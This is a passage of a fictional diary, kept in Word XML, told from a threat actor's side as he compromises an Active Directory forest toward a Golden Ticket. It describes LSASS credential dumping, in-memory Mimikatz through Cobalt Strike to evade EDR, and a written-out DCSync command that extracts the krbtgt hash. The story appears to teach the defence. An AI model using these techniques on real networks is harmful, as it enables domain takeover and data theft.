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C5E2D" w14:textId="5EB8804A" w:rsidR="00420894" w:rsidRDefault="00420894">
      <w:r>
        <w:t>Diary #2 – Diary of Attacker and Defender – The Golden Ticket War</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D403FE" w14:textId="5E34F809" w:rsidR="00420894" w:rsidRDefault="00420894">
      <w:r>
        <w:t>THREAT ACTOR DOSSIER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289F1EA2" w14:textId="2A72CDBD" w:rsidR="00420894" w:rsidRDefault="00420894">
      <w:r>
        <w:t>Designation:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>The Architect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDF9F45" w14:textId="3BA43C66" w:rsidR="00420894" w:rsidRDefault="00420894">
      <w:r>
        <w:t>Motivation:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Espionage / Long-term persistence for data exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76937CD0" w14:textId="00E702D0" w:rsidR="00420894" w:rsidRDefault="00420894">
      <w:r>
        <w:t>Sophistication:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Advanced – patient, methodical, understands Kerberos at the protocol level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1E86E6" w14:textId="281C73E0" w:rsidR="00420894" w:rsidRDefault="00420894">
      <w:r>
        <w:t>Known Tools:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Mimikatz, Rubeus, BloodHound, Cobalt Strike, custom .NET assemblies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6A8128" w14:textId="646715F5" w:rsidR="00420894" w:rsidRDefault="00420894">
      <w:r>
        <w:t>OPSEC Discipline:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>High – burns infrastructure aggressively, never reuses tooling signatures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769F47DB" w14:textId="1E7ABCA0" w:rsidR="00420894" w:rsidRDefault="00420894">
      <w:r>
        <w:t>DEFENDER DOSSIER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D47C154" w14:textId="411A4AA0" w:rsidR="00420894" w:rsidRDefault="00420894">
      <w:r>
        <w:t>Role:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Principal Identity Security Engineer / Blue Team Lead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2947AC21" w14:textId="38885BA1" w:rsidR="00420894" w:rsidRDefault="00420894">
      <w:r>
        <w:t>Experience:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>12 years enterprise AD, former red teamer turned defender</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688965AF" w14:textId="0B2EADF3" w:rsidR="00420894" w:rsidRDefault="00420894">
      <w:r>
        <w:t>Context:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Proactive defense, recently inherited a legacy forest with minimal logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C7CF1D" w14:textId="749679DE" w:rsidR="00420894" w:rsidRPr="00D83477" w:rsidRDefault="00420894">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Outcome:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TBD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4015A2CF" w14:textId="14B4666E" w:rsidR="00420894" w:rsidRPr="00D83477" w:rsidRDefault="00420894">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D83477">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>November 3 – 0347</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E6704A" w14:textId="7B61B1E8" w:rsidR="00420894" w:rsidRPr="00D83477" w:rsidRDefault="00420894">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D83477">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attacker’s Journal Entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9CDA48" w14:textId="3DA81B67" w:rsidR="00420894" w:rsidRDefault="00D83477">
      <w:r>
        <w:t>It sucks being</w:t>
      </w:r>
      <w:r w:rsidR="00420894">
        <w:t xml:space="preserve"> me</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at this moment in time as I sit here in this</w:t>
      </w:r>
      <w:r w:rsidR="00420894">
        <w:t xml:space="preserve"> cold parking garage. I’m sitting in a rental Chevy Malibu that smells like stale cigarettes and regret, tethered to a Verizon MiFi hotspot, staring at a BloodHound graph that took almost six hours to ingest. Six hours. This target’s forest is a goddamn labyrinth – three domains, twelve trusts, and enough legacy GPOs to make a sysadmin weep.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0428DB14" w14:textId="61AD3B46" w:rsidR="00420894" w:rsidRDefault="00420894">
      <w:r>
        <w:t xml:space="preserve">But I found it, finally, for god’s sake. The beloved golden goose. Domain Controller </w:t>
      </w:r>
      <w:r w:rsidRPr="00D83477">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>DC01.corp.target.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Windows Server 2012 R2, unpatched since approximately the Obama administration. And it’s a PDC Emulator (PDCe). Of course it is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BDD48D" w14:textId="3FFA757D" w:rsidR="00420894" w:rsidRDefault="00420894">
      <w:r>
        <w:t xml:space="preserve">Here’s what most script kiddies don’t understand about Golden Tickets: it’s not about “running Mimikatz, pwning, and winning.” That’s like saying bank robbery is about “having a gun.” The real work is everything </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> you touch that DC. You need to understand the Kerberos ticket structure – the KDCs long-term key, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash, the entire authentication trust model. Because once you forge a TGT signed with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash, </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">you’re not impersonating a user. You are essentially </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>becoming</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the Key Distribution Center (KDC). Every service ticket, every authorization decision, every access control elevation – it all flows from that single secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6A59D5" w14:textId="02722310" w:rsidR="00420894" w:rsidRDefault="00420894">
      <w:r>
        <w:t xml:space="preserve">And here’s the beautiful, terrible truth: the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> password almost never changes. I’ve seen Fortune 500 companies running the same </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">eight years. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Eight. </w:t>
      </w:r>
      <w:r w:rsidR="00D83477">
        <w:t>Crazy</w:t>
      </w:r>
      <w:r>
        <w:t>. Years. Because rotating it breaks things</w:t>
      </w:r>
      <w:r w:rsidR="00696B3A">
        <w:t>. Legacy apps break. Service accounts break. Some third-party garbage that nobody owns or claims breaks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and sysadmins are scared to do it. I mean, yeah, it </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> risky business, but that’s what this industry is all about.</w:t>
      </w:r>
      <w:r w:rsidR="00696B3A">
        <w:t xml:space="preserve"> So, sysadmins just… don’t. They kick the can down the road until someone like me shows up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFFE972" w14:textId="7DB97104" w:rsidR="00696B3A" w:rsidRDefault="00696B3A">
      <w:r>
        <w:t xml:space="preserve">My immediate problem, however: I don’t have Domain Admin yet. I have a pretty stable foothold on </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>WS-ACCT-047</w:t>
      </w:r>
      <w:r>
        <w:t>, an accounting workstation it seems, via a phishing payload that some poor bastard opened three whole days ago. Low privilege. Boring. But enough to start me some recon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23779000" w14:textId="0B1A3D08" w:rsidR="00696B3A" w:rsidRDefault="00696B3A">
      <w:r>
        <w:t xml:space="preserve">But! I need to escalate and I need to escalate fast because there’s no telling what I might be facing once I start to pivot, and if I trip something by accident, I need to hurry up and move and obfuscate </w:t>
      </w:r>
      <w:r w:rsidR="00315570">
        <w:t>quickly!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A298495" w14:textId="7F66B90A" w:rsidR="00696B3A" w:rsidRDefault="00696B3A">
      <w:r>
        <w:t>Ok, I have the path sitting right in front of me. Let’s do this. (Cracks knuckles; stretches hands out forward</w:t>
      </w:r>
      <w:r w:rsidR="000D0F3B">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:t>flexes fingers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10850F4A" w14:textId="710C1493" w:rsidR="00696B3A" w:rsidRDefault="00696B3A">
      <w:r>
        <w:t>Here is my plan, trusty journal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D95999D" w14:textId="7B286BD4" w:rsidR="00696B3A" w:rsidRDefault="00696B3A">
      <w:r>
        <w:t>First, I need to start by getting my hands on some credentials, so it’s time to go harvesting. I think first I’ll dump LSASS on this workstation. Even low-priv sessions have cached credentials, Kerberos tickets, maybe a service account password, or two…</w:t>
      </w:r>
      <w:r w:rsidR="000D0F3B">
        <w:t>but</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I need </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">something </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to move laterally. Hmmm…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A5C55D" w14:textId="1B24CD27" w:rsidR="00696B3A" w:rsidRDefault="00696B3A">
      <w:r>
        <w:t xml:space="preserve">Once I find whatever that is I’ll have to quickly find a path to a higher-value target. BloodHound is reporting that </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>WS-ACCT-047</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has local admin rights on </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>WS-HR-012</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> because some genius thought it smart to put the “Accounting” and “HR” groups in the same local Administrators GPO. Beautiful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A9F78D" w14:textId="0AEFF6F0" w:rsidR="00696B3A" w:rsidRDefault="00696B3A">
      <w:r>
        <w:t>Once I’m on a better host, dump credentials until I hit a Domain Admin session. Then it’s DC time, like Hammer Time…get it? Sigh. I’m my own comedian most of the time. Gets lonely having to do work like this and always be covert on the low from everyone and everything. How I miss the sun.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E836E83" w14:textId="2F0CCD62" w:rsidR="00696B3A" w:rsidRDefault="00696B3A">
      <w:r>
        <w:t xml:space="preserve">Anyways, enough lamenting, back to work – I need to pay this month’s Disney+ subscription: So, next what I have to do is DCSync the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash. No need to touch the DC directly if I have repl rights. Then, according to my notes from Fr0993r0x1</w:t>
      </w:r>
      <w:r w:rsidR="00171605">
        <w:t xml:space="preserve">, the last time </w:t>
      </w:r>
      <w:r w:rsidR="00171605">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">she performed this she had to forge a TGT for a non-existent user – a real user with modified group memberships. One bold, </w:t>
      </w:r>
      <w:r w:rsidR="000D0F3B">
        <w:t>underlined</w:t>
      </w:r>
      <w:r w:rsidR="00171605">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000D0F3B">
        <w:t xml:space="preserve">(multiple times I might add) </w:t>
      </w:r>
      <w:r w:rsidR="00171605">
        <w:t>phrase she wrote was:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62112047" w14:textId="58F907D0" w:rsidR="00171605" w:rsidRPr="00DE6295" w:rsidRDefault="00171605">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6295">
        <w:rPr>
          <w:rFonts w:ascii="MV Boli" w:hAnsi="MV Boli" w:cs="MV Boli"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>#@!!! MAKE PERSISTENCE LOOK LEGITIMATE !!!@#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752A0751" w14:textId="43388CCF" w:rsidR="00171605" w:rsidRDefault="00171605">
      <w:r>
        <w:t xml:space="preserve">Once I’m in I’ll use the Golden Ticket to request service tickets for any resource in the domain, then exfiltrate the data </w:t>
      </w:r>
      <w:r w:rsidR="000D0F3B">
        <w:t>@1337H@ck3RKoO!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wants and has been bugging me for over the last month, and just to piss him off (and cover my ass), I’m going to do it slowly. Very slowly. I’m thinking about six months minimum before anyone notices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5040F8" w14:textId="02E82E6F" w:rsidR="00171605" w:rsidRDefault="00171605">
      <w:r>
        <w:t xml:space="preserve">I’ve always been commended for how </w:t>
      </w:r>
      <w:r w:rsidRPr="00A557F6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>1337</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> my OPSEC skills are, so  I need to repeat my luck mantra, and I need to be careful with my LSASS dump. Windows Defender on this host is… actually… not that terrible. It’s running in real-time protection mode. If I drop </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>mimikatz.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, it’ll get eaten alive and will surely set off alarms. But I have a custom .NET assembly that will load it entirely in memory via Cobalt Strike’s </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0F3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>execute-assembly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. No disk touching. No signatures used. Just a CLR thread doing exactly what Mimikatz </w:t>
      </w:r>
      <w:r w:rsidR="000D0F3B">
        <w:t>does but</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> looking like on</w:t>
      </w:r>
      <w:r w:rsidR="000D0F3B">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of the DevSecOps teams’ legitimate .NET process to the EDR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFED5A1" w14:textId="5FE3B878" w:rsidR="00171605" w:rsidRDefault="00171605">
      <w:r>
        <w:t>Alright, I think I’m set. Everything seems to be in place and in order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA5E990" w14:textId="46CFB5D5" w:rsidR="00171605" w:rsidRDefault="00171605">
      <w:r>
        <w:t>Time to get to work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0D4FD8" w14:textId="061A4C93" w:rsidR="00171605" w:rsidRPr="00DE6295" w:rsidRDefault="00171605">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6295">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>November 3 – 0412</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5F4AB0" w14:textId="42770938" w:rsidR="00171605" w:rsidRPr="00DE6295" w:rsidRDefault="00171605">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6295">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attacker’s Journal Entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1541FF" w14:textId="32518697" w:rsidR="00171605" w:rsidRDefault="00171605">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Holy </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>crap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Holy </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>crap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2046AB" w14:textId="1F84B480" w:rsidR="00171605" w:rsidRDefault="00171605">
      <w:r>
        <w:t xml:space="preserve">The LSASS dump paid off bigger than I expected. I pulled four Kerberos TGTs, two NTLM hashes, and – get this – a cleartext password for </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6295">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>svc-backup@corp.target.local</w:t>
      </w:r>
      <w:r>
        <w:t>. Some backup agent stores its credentials in LSASS memory in plaintext. Oh, how I just LOVE enterprise software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C95E841" w14:textId="2EF01E1C" w:rsidR="00171605" w:rsidRDefault="00171605">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>svc-backup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> account isn’t Domain Admin, but BloodHound shows it has </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Replicating Directory Changes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> permissions on the domain object. That’s… that’s DCSync rights.</w:t>
      </w:r>
      <w:r w:rsidR="004068EE">
        <w:t xml:space="preserve"> I don’t need to compromise a Domain Admin session. Hell, I can literally pull the </w:t>
      </w:r>
      <w:r w:rsidR="004068EE" w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r w:rsidR="004068EE">
        <w:t xml:space="preserve"> hash </w:t>
      </w:r>
      <w:r w:rsidR="004068EE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>right now</w:t>
      </w:r>
      <w:r w:rsidR="004068EE">
        <w:t xml:space="preserve"> from this workstation using </w:t>
      </w:r>
      <w:r w:rsidR="004068EE" w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>lsadump::dcsync</w:t>
      </w:r>
      <w:r w:rsidR="004068EE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>using my sweet little</w:t>
      </w:r>
      <w:r w:rsidR="004068EE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="004068EE">
        <w:t>in-memory</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="004068EE">
        <w:t xml:space="preserve"> Mimikatz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA0DE78" w14:textId="01EC731B" w:rsidR="004068EE" w:rsidRDefault="00A40F32">
      <w:r>
        <w:t>First, l</w:t>
      </w:r>
      <w:r w:rsidR="004068EE">
        <w:t>et me be clear about what just happened: I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> just</w:t>
      </w:r>
      <w:r w:rsidR="004068EE">
        <w:t xml:space="preserve"> went from a phished accounting workstation </w:t>
      </w:r>
      <w:r>
        <w:t>and, like cake-walk, pivoted right over to</w:t>
      </w:r>
      <w:r w:rsidR="004068EE">
        <w:t xml:space="preserve"> the keys to the entire kingdom in</w:t>
      </w:r>
      <w:r>
        <w:t>, I’d say…mmmm less than</w:t>
      </w:r>
      <w:r w:rsidR="004068EE">
        <w:t xml:space="preserve"> under thirty minutes. Not because I’m an awesome genius – but </w:t>
      </w:r>
      <w:r w:rsidR="004068EE">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">because someone granted DCSync rights to a service account and nobody audits who has those permissions. This is the kind of </w:t>
      </w:r>
      <w:r w:rsidR="00315570">
        <w:t>stuff</w:t>
      </w:r>
      <w:r w:rsidR="004068EE">
        <w:t xml:space="preserve"> that makes me want to buy the entire blue team a drink and then slap the </w:t>
      </w:r>
      <w:r w:rsidR="00315570">
        <w:t>life</w:t>
      </w:r>
      <w:r w:rsidR="004068EE">
        <w:t xml:space="preserve"> out of them at the same time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DC8473" w14:textId="4B861BD9" w:rsidR="004068EE" w:rsidRDefault="004068EE">
      <w:r>
        <w:t xml:space="preserve">I’m going to pull this </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash right now. Then I’m going dark for another 48 hours. No traffic. No beacons. Let the initial phishing alert age out of their SOC queue. When I come back, I’ll forge the Golden Ticket from a completely different infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE84796" w14:textId="5FCAD6F0" w:rsidR="004068EE" w:rsidRDefault="004068EE">
      <w:r>
        <w:t>The hash extraction itself is trivial:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC1B22D" w14:textId="4138078B" w:rsidR="004068EE" w:rsidRPr="00CE6E70" w:rsidRDefault="004068EE" w:rsidP="00DE6295">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>lsadump::dcsync /domain:corp.target.local /user:krbtgt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418EC733" w14:textId="522D9B28" w:rsidR="004068EE" w:rsidRDefault="004068EE">
      <w:r>
        <w:t xml:space="preserve">That’s all it takes. One command, and one click of the Enter button. The DC will then happily serve me the hash because </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>svc-backup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has replication rights. The DC doesn’t know I’m </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> another DC… it just sees valid permissions and complies like the good DC it is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9E235B" w14:textId="5A75E4F8" w:rsidR="004068EE" w:rsidRDefault="004068EE">
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t xml:space="preserve"> am now the master of the universe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> now</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t xml:space="preserve"> that I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hold the</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>ir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> master key</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t xml:space="preserve"> – the key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to every Kerberos authentication in </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>their pathetic excuse for a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> domain. </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t xml:space="preserve">Just so you know, because knowledge is power – I </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> forge a ticket for the CEO. I could forge a ticket for a non-existent user with Domain Admin privileges. I could make a ticket that lasts ten years. The only limit is my imagination and their logging – which, based on the complete absence of Event ID 4662 (Directory Service Access) alerts for DCSync operations, appears to be “minimal.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13741DD1" w14:textId="4A3F4298" w:rsidR="004068EE" w:rsidRDefault="004068EE">
      <w:r>
        <w:t xml:space="preserve">I’m saving the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has to an encrypted container on a dead-drop USB. Then I’m burning this Cobalt Strike beacon, wiping the staging server, and vanishing. See you in two days, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>corp.target.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>mine</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BF746E" w14:textId="697BC1F8" w:rsidR="004068EE" w:rsidRPr="00DE6295" w:rsidRDefault="004068EE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6295">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>November 3 – 0923</w:t>
      </w:r>
    </w:p>
